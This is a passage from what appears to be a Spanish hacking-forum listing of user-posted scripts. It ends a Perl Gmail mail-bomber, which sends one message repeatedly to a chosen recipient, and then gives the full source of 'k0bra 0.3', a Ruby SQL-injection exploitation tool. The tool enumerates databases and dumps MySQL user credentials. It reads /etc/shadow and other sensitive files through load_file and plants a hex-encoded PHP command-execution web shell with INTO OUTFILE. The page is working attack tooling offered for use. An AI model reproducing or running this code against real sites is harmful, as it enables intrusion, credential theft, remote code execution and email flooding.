  114. )->place( -x => 45, -y => 350 );
  115. $body->insert( "end", "Welcome to the hell" );
  116.  
  117. $ve->Button(
  118.     -text             => "Send",
  119.     -width            => 10,
  120.     -command          => \&start,
  121.     -background       => $color_fondo,
  122.     -foreground       => $color_texto,
  123.     -activebackground => $color_texto
  124. )->place( -x => 43, -y => 550 );
  125. $ve->Button(
  126.     -text             => "About",
  127.     -width            => 10,
  128.     -command          => \&about,
  129.     -background       => $color_fondo,
  130.     -foreground       => $color_texto,
  131.     -activebackground => $color_texto
  132. )->place( -x => 117, -y => 550 );
  133. $ve->Button(
  134.     -text             => "Exit",
  135.     -width            => 10,
  136.     -command          => [ $ve => "destroy" ],
  137.     -background       => $color_fondo,
  138.     -foreground       => $color_texto,
  139.     -activebackground => $color_texto
  140. )->place( -x => 190, -y => 550 );
  141.  
  142. MainLoop;
  143.  
  144. sub start {
  145.  
  146.     $text = $body->get( "1.0", "end" );
  147.     chomp $text;
  148.  
  149.     if (
  150.         my $mail = Email::Send::SMTP::Gmail->new(
  151.             -smtp  => "gmail.com",
  152.             -login => $user->get,
  153.             -pass  => $pass->get
  154.         )
  155.       )
  156.     {
  157.  
  158.         for my $number ( 1 .. $number->get ) {
  159.             $ve->update;
  160.             $mail->send(
  161.                 -to      => $to->get,
  162.                 -subject => $tema->get,
  163.                 -body    => $text
  164.             );
  165.         }
  166.  
  167.         Win32::MsgBox( "Send", 0, "Mails Send" );
  168.  
  169.         $mail->bye;
  170.  
  171.     }
  172.     else {
  173.         Win32::MsgBox( "Error in the login", 0, "Error" );
  174.     }
  175. }
  176.  
  177. sub about {
  178.  
  179.     my $text =
  180. "This program was written by Doddy H for the Tournament of Programming Perl
  181. to forum HackxCrack";
  182.  
  183.     Win32::MsgBox( $text, 0, "About" );
  184.  
  185. }
  186.  
  187. #The End ?
  188.  
380  Programación / Scripting / [Ruby] k0bra 0.3 en: 16 Febrero 2012, 18:16 pm
Un simple scanner SQLI con las siguientes funciones


  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
Código
  1. #!usr/bin/ruby
  2. #K0bra 0.3
  3. #Coded By Doddy H
  4.  
  5. require "net/http"
  6.  
  7. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  8.  
  9. def toma(web)
  10.   return Net::HTTP.get_response(URI.parse(web)).body
  11. end
  12.  
  13. def copyright()
  14.   print "\n\n(C) Doddy Hackman 2012\n\n"
  15.   gets.chomp
  16. end
  17.  
  18. def installer()
  19.   dir = Dir::pwd+"/"+"logs_webs"
  20.   if not FileTest::directory?(dir)
  21.     Dir::mkdir(dir)
  22.   end
  23. end
  24.  
  25. def encodehex(texto)
  26.   return "0x"+(texto.unpack('H*')[0])
  27. end
  28.  
  29. def savefile(file,text)
  30.   url = URI.parse(file)
  31.   save = File.open("logs_webs/"+url.host+".txt","a")
  32.   save.puts text+"\n"
  33.   save.close
  34. end
  35.  
  36. def bypass(op)
  37.   if op=="--"
  38.     return "+","--"
  39.   elsif op=="/*"
  40.    return "/**/","/**/"
  41.   elsif op=="%20"
  42.    return "%20","%00"
  43.   else
  44.    return "+","--"    
  45.   end
  46. end
  47.  
  48. def head()
  49.  
  50.   print "
  51.  
  52.  @      @@   @             
  53. @@     @  @ @@             
  54.  @ @@  @  @  @ @   @ @ @@@ 
  55.  @ @   @  @  @@ @ @@@ @  @ 
  56.  @@    @  @  @  @  @   @@@ 
  57.  @ @   @  @  @  @  @  @  @ 
  58. @@@ @   @@   @@@  @@@ @@@@@
  59.  
  60. "
  61. end
  62.  
  63. def volverinicio()
  64.   print "\n\n[+] Press any key to continue\n\n"
  65.   gets.chomp
  66.   inicio()
  67. end
  68.  
  69. def clean()
  70.   if RUBY_PLATFORM=~/win/
  71.     system("cls")
  72.   else
  73.     system("clear")
  74.   end
  75. end
  76.  
  77. def retorno(url,by)
  78.   print "\n\n[+] Press any key to continue\n\n"
  79.   gets.chomp
  80.   central(url,by)
  81. end
  82.  
  83. def gettables(url,by)
  84.   pass1,pass2 = bypass(by)
  85.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  86.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  87.   print "\n\n[+] Getting tables ...\n\n"
  88.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  89.   if code1=~/K0BRA(.*?)K0BRA/
  90.     total = $1
  91.     print "[+] Tables Found : ",total,"\n\n"
  92.     savefile(url,"\n[+] Tables Found : #{total}\n")
  93.     for num in ("17"..total)
  94.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
  95.       if code2=~/K0BRA(.*?)K0BRA/
  96.         table = $1
  97.         print "[+] Table Found : "+table+"\n"
  98.         savefile(url,"[+] Table Found : #{table}")
  99.       end
  100.     end
  101.   else
  102.     print "[-] Not Found\n"
  103.   end 
  104. end
  105.  
  106. def getcolumns(url,by,tablex)
  107.   tablexa = encodehex(tablex)
  108.   pass1,pass2 = bypass(by)
  109.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  110.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  111.   print "\n\n[+] Getting columns ...\n\n"
  112.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  113.   if code1=~/K0BRA(.*?)K0BRA/
  114.     total = $1
  115.     print "[+] Columns Found : ",total,"\n\n"
  116.     savefile(url,"\n[+] Table : #{tablex}")
  117.     savefile(url,"[+] Columns Found : #{total}\n")
  118.     for num in ("0"..total)
  119.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
  120.       if code2=~/K0BRA(.*?)K0BRA/
  121.         table = $1
  122.         print "[+] Column Found : "+table+"\n"
  123.         savefile(url,"[+] Column Found : #{table}")
  124.       end
  125.     end
  126.   else
  127.     print "[-] Not Found\n"
  128.   end 
  129. end
  130.  
  131. def getdbs(url,by)
  132.   pass1,pass2 = bypass(by)
  133.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  134.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  135.   print "\n\n[+] Getting DBS ...\n\n"
  136.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  137.   if code1=~/K0BRA(.*?)K0BRA/
  138.     total = $1
  139.     print "[+] DBS Found : ",total,"\n\n"
  140.     savefile(url,"\n[+] DBS Found : #{total}\n")
  141.     for num in ("0"..total)
  142.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
  143.       if code2=~/K0BRA(.*?)K0BRA/
  144.         table = $1
  145.         print "[+] DB Found : "+table+"\n"
  146.         savefile(url,"[+] DB Found : #{table}")
  147.       end
  148.     end
  149.   else
  150.     print "[-] Not Found\n"
  151.   end 
  152. end
  153.  
  154. def gettablesbydb(url,by,dbx)
  155.   data  = encodehex(dbx)
  156.   pass1,pass2 = bypass(by)
  157.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  158.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  159.   print "\n\n[+] Getting tables ...\n\n"
  160.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  161.   if code1=~/K0BRA(.*?)K0BRA/
  162.     total = $1
  163.     print "[+] Tables Found : ",total,"\n\n"
  164.     savefile(url,"\n[+] DBS : #{dbx}")
  165.     savefile(url,"[+] Tables Found : #{total}\n")
  166.     for num in ("0"..total)
  167.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  168.       if code2=~/K0BRA(.*?)K0BRA/
  169.         table = $1
  170.         print "[+] Table Found : "+table+"\n"
  171.         savefile(url,"[+] Table Found : #{table}")
  172.       end
  173.     end
  174.   else
  175.     print "[-] Not Found\n"
  176.   end 
  177. end
  178.  
  179. def getcolumnsbydb(url,by,db,tab)
  180.   data = encodehex(db)
  181.   tabx = encodehex(tab)
  182.  
  183.   pass1,pass2 = bypass(by)
  184.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  185.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  186.   print "\n\n[+] Getting columns ...\n\n"
  187.   code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  188.   if code1=~/K0BRA(.*?)K0BRA/
  189.     total = $1
  190.     print "[+] Columns Found : ",total,"\n\n"
  191.     savefile(url,"\n[+] DB : #{db}")
  192.     savefile(url,"[+] Table : #{tab}")
  193.     savefile(url,"[+] Columns Found : #{total}\n")
  194.     for num in ("0"..total)
  195.       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  196.       if code2=~/K0BRA(.*?)K0BRA/
  197.         table = $1
  198.         print "[+] Column Found : "+table+"\n"
  199.         savefile(url,"[+] Column Found : #{table}")
  200.       end
  201.     end
  202.   else
  203.     print "[-] Not Found\n"
  204.   end 
  205. end
  206.  
  207. def mysqluser(url,by)
  208.   pass1,pass2 = bypass(by)
  209.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  210.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  211.    print "\n\n[+] Searching mysql.user\n\n"
  212.   code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  213.   if code1=~/K0BRA(.*?)K0BRA/
  214.     total = $1
  215.     print "[+] Users Mysql Found : ",total,"\n\n"
  216.     savefile(url,"[+] Users Mysql Found : "+total+"\n")
  217.     for num in ("0"..total)
  218.       code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
  219.       if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
  220.         host,user,passw = $1,$2,$3
  221.         print "[Host] : "+host
  222.         print " [User] : "+user
  223.         print " [Pass] : "+passw+"\n"   
  224.         savefile(url,"[Host] : "+host)
  225.         savefile(url,"[User] : "+user)
  226.         savefile(url,"[Pass] : "+passw+"\n")
  227.       end
  228.     end
  229.   else
  230.     print "[-] Not Found\n"
  231.   end
  232. end
  233.  
  234. def details(url,by)
  235.   pass1,pass2 = bypass(by)
  236.   hextest = "0x2f6574632f706173737764" #/etc/passwd
  237.   hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  238.   web1 = url.sub(/hackman/,"0x4b30425241")
  239.   web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  240.   web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  241.    print "\n\n[+] Extrating information of the DB\n\n"
  242.   code1 = toma(web2)
  243.   if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
  244.     user,data,ver = $1,$2,$3
  245.     print "\n[+] Username : "+user
  246.     print "\n[+] Database : "+data
  247.     print "\n[+] Version : "+ver+"\n\n"
  248.     savefile(url,"\n[+] Username : "+user)
  249.     savefile(url,"[+] Database : "+data)
  250.     savefile(url,"[+] Version : "+ver+"\n")
  251.   else
  252.     print "[-] Not Found\n"
  253.   end
  254.    code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  255.    code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  256.    code4 = toma(web3)
  257.    if code2=~/K0BRA/
  258.      print "[+] Mysqluser : ON\n"
  259.      savefile(url,"[+] Mysqluser : ON")
  260.    end
  261.    if code3=~/K0BRA/
  262.      print "[+] information_schema : ON\n"
  263.      savefile(url,"[+] information_schema : ON")
  264.    end
  265.    if code4=~/ERTOR854/
  266.      print "[+] load_file : ON\n"
  267.      savefile(url,"[+] load_file : ON")
  268.    end   
  269.    savefile(url,"") #espacio en blanco
  270.  end
  271.  
  272.  def dumper(url,by,table,col1,col2)
  273.   pass1,pass2 = bypass(by)
  274.   web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  275.   web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  276.   print "\n\n[+] Getting Values ...\n\n"
  277.   code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  278.   if code1=~/K0BRA(.*?)K0BRA/
  279.     total = $1
  280.     savefile(url,"\n[+] Table : "+table)
  281.     savefile(url,"[+] Column 1 : "+col1)
  282.     savefile(url,"[+] Column 2 : "+col2)
  283.     print "[+] Values Found : ",total,"\n\n"
  284.     savefile(url,"\n[+] Values Found : #{total}\n")
  285.     for num in ("0"..total)
  286.       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
  287.       if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
  288.         uno,dos = $1,$2
  289.         print "\n[+] "+col1+" : "+uno+"\n"
  290.         print "[+] "+col2+" : "+dos+"\n"
  291.         savefile(url,"\n[+] "+col1+" : "+uno)
  292.         savefile(url,"[+] "+col2+" : "+dos)
  293.       end
  294.     end
  295.   else
  296.     print "[-] Not Found\n"
  297.   end 
  298. end
  299.  
  300. def fuzzfile(url,by)
  301.   pass1,pass2 = bypass(by)
  302.   print "\n\n[+] Fuzzing Files with load_file ....\n"
  303.   $files.each do |file|
  304.     res = file
  305.     file = file.chomp
  306.     file = encodehex(file)
  307.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  308.     code = toma(web1)
  309.     if code=~/ERTOR854(.*?)ERTOR854/m
  310.       print "\n\n[File Found] : ",res
  311.       print "\n\n[Source Start]\n"
  312.       print $1
  313.       print "\n[Source End]"
  314.       savefile(url,"\n[File Found] : "+res)
  315.       savefile(url,"\n[Source Start]\n")
  316.       savefile(url,$1)
  317.       savefile(url,"\n[Source End]")
  318.     end    
  319.   end
  320. end
  321.  
  322. def abrirfile(url,by,file)
  323.   pass1,pass2 = bypass(by)
  324.   print "\n\n[+] Opening file ....\n"
  325.   res = file
  326.   file = encodehex(file)
  327.     web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  328.     code = toma(web1)
  329.     if code=~/ERTOR854(.*?)ERTOR854/m
  330.       print "\n\n[File Found] : ",res
  331.       print "\n\n[Source Start]\n"
  332.       print $1
  333.       print "\n[Source End]"
  334.       savefile(url,"\n[File Found] : "+res)
  335.       savefile(url,"\n[Source Start]\n")
  336.       savefile(url,$1)
  337.       savefile(url,"\n[Source End]")
  338.     else
  339.       print "\n\n[-] Error\n\n" 
  340.     end    
  341. end
  342.  
  343. def into(url,by,full,dir)
  344.   pass1,pass2 = bypass(by)
  345.   linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  346.   lugar = full+"/cmd.php"
  347.   lugardos = dir+"/cmd.php"
  348.   h = URI.parse(url)
  349.   webtest = "http://"+h.host+lugardos
  350.   web1 = url.sub(/hackman/,linea)
  351.   formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  352.   toma(formandoweb)
  353.   code = toma(webtest)
  354.   if code=~/Mini Shell By Doddy/
  355.     print "\n\n[shell up] : "+webtest+"\n"
  356.     savefile(url,"\n[shell up] : "+webtest+"\n")
  357.   else
  358.     print "\n\n[-] Error\n"
  359.   end
  360. end
  361.  
  362. def central(url,by)
  363.   clean()
  364.   head()
  365.   print "\n\n[+] Page : #{url}\n"
  366.   print "[+] ByPass : #{by}\n\n\n"
  367.  
  368.   print "\n[information_schema]\n\n"
  369.   print "1 - Show tables\n"
  370.   print "2 - Show columns of the a table\n"
  371.   print "3 - Show databases\n"
  372.   print "4 - Show tables from the a DB\n"
  373.   print "5 - Show columns from the a table of the DB\n"
  374.   print "\n[mysql.user]\n\n"
  375.   print "6 - Show users\n"
  376.   print "\n[Others]\n\n"
  377.   print "7 - Show details\n"
  378.   print "8 - Dump data\n" 
  379.   print "9 - Fuzz Files with load_file\n"
  380.   print "10 - Load files with load_file\n"
  381.   print "11 - Create Shell\n"
  382.   print "12 - Show log\n"
  383.   print "13 - Change target\n"
  384.   print "14 - Exit\n\n"
  385.  
  386.   print "[+] Option : "
  387.   op = gets.chomp
  388.  
  389.   if op == "1"
  390.     gettables(url,by)
  391.     retorno(url,by)
  392.   elsif op == "2"
  393.     print "\n\n[+] Table : "
  394.     table = gets.chomp
  395.     getcolumns(url,by,table)
  396.     retorno(url,by)
  397.   elsif op == "3"
  398.     getdbs(url,by)
  399.     retorno(url,by)
  400.   elsif op == "4"
  401.     print "\n\n[+] DB : "
  402.     db = gets.chomp
  403.     gettablesbydb(url,by,db)
  404.     retorno(url,by)
  405.   elsif op == "5"
  406.     print "\n\n[+] DB : "
  407.     db = gets.chomp
  408.     print "\n\n[+] Table : "
  409.     tab = gets.chomp
  410.     getcolumnsbydb(url,by,db,tab)
  411.     retorno(url,by)
  412.   elsif op == "6"
  413.     mysqluser(url,by)
  414.     retorno(url,by)
  415.   elsif op == "7"
  416.     details(url,by)
  417.     retorno(url,by)
  418.   elsif op == "8"
  419.     print "\n\n[+] Table : "
  420.     table = gets.chomp
  421.     print "\n\n[+] Column 1 : "
  422.     col1 = gets.chomp
  423.     print "\n\n[+] Column 2 : "
  424.     col2 = gets.chomp
  425.     dumper(url,by,table,col1,col2)
  426.     retorno(url,by)
  427.   elsif op == "9"
  428.     fuzzfile(url,by)
  429.     retorno(url,by)
  430.   elsif op == "10"
  431.     print "\n\n[+] File : "
  432.     file = gets.chomp
  433.     abrirfile(url,by,file)
  434.     retorno(url,by)
  435.   elsif op == "11"
  436.     print "\n\n[Full Source Discloure] : "
  437.     full = gets.chomp
  438.     print "\n\n[Directory to test] : "
  439.     dir = gets.chomp
  440.     into(url,by,full,dir)
  441.     retorno(url,by)
  442.   elsif op == "12"
  443.     urla = URI.parse(url)
  444.     ar = "logs_webs/"+urla.host+".txt"
  445.     system("start #{ar}")
  446.     retorno(url,by)
  447.   elsif op == "13"
  448.     inicio()
  449.   elsif op == "14"
  450.     copyright()
  451.   else
  452.     retorno(url,by)
  453.   end
  454. end
  455.  
  456. def findlength(url,by)
  457.   pass1,pass2 = bypass(by)
  458.   z = "1"
  459.   x = "concat(0x4b30425241,1,0x4b30425241)"
  460.   for num in ('2'..'25')
  461.     z = z+","+num
  462.     x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  463.     code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
  464.     if code=~/K0BRA(.*?)K0BRA/
  465.       print "[+] The Page has "+num+" columns\n"
  466.       print "[+] The number "+$1+" print data"
  467.       z = z.sub($1,"hackman")
  468.       sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
  469.       savefile(url,"[+] SQLI : "+sqli)
  470.       savefile(url,"[+] Bypass : "+by+"\n")
  471.       central(sqli,by)
  472.     end
  473.   end
  474. end
  475.  
  476. def testvul(page,by) 
  477.   pass1,pass2 = bypass(by)
  478.   print "\n\n[+] Testing vulnerability ...\n\n"
  479.   codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  480.   codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  481.   if codeuno != codedos
  482.     print "[+] Vulnerable !\n"
  483.     findlength(page,by)
  484.   else
  485.     print "[-] Not vulnerable\n"
  486.     print "\n\n[+] Scan anyway y/n : "
  487.     op = gets.chomp
  488.     if op == "y"
  489.       findlength(page,by)
  490.   else
  491.     volverinicio()
  492.   end
  493.  end  
  494. end
  495.  
  496. def inicio()
  497.   clean()
  498.   head()
  499.   print "\n\n[+] Page : "
  500.   page = gets.chomp
  501.   print "\n\n[+] Bypass : "
  502.   by = gets.chomp
  503.   if page=~/hackman/
  504.     central(page,by)
  505.   else
  506.     testvul(page,by)
  507.   end
  508. end
  509.  
  510. installer()
  511. inicio()
  512.  
  513. # The End ? 
  514.  
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 55
